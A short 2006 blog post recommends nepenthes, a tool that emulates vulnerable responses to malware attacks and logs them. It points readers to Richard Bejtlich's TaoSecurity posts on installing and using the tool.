average admins

This is an awesome idea! These guys wrote a program that will monitor your web traffic while you browse sniffing for malware attacks. Once it detects an attack, it will emulate a valid response and log all communications. That’s just cool.

I learned about the tool from Richard Bejtlich’s blog, TaoSecurity. It’s called nepenthes and you can downlaod it from http://nepenthes.mwcollect.org/

One thing I really like about Richard Bejtlich’s blog posts is that he’s very thorough. You can read about his experience installing and using nepenthes at the following URLs:

http://taosecurity.blogspot.com/2006/01/nepenthes-discoveries-earlier-today-i.html
http://taosecurity.blogspot.com/2006/01/nepenthes-installation-ive-been.html

This tool comes prepackaged for all the cool distros: Gentoo, Debian, and FreeBSD, but of course the source is also provided along with instructions with getting it compiled and running in Windows.

You can find the README at http://nepenthes.mwcollect.org/documentation:readme.

This entry was posted on Friday, April 7th, 2006 at 3:06 pm and is filed under Exploits, FreeBSD, Hacking, Linux, Microsoft, Open Source, Privacy, Security, Software, Spyware, Windows. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.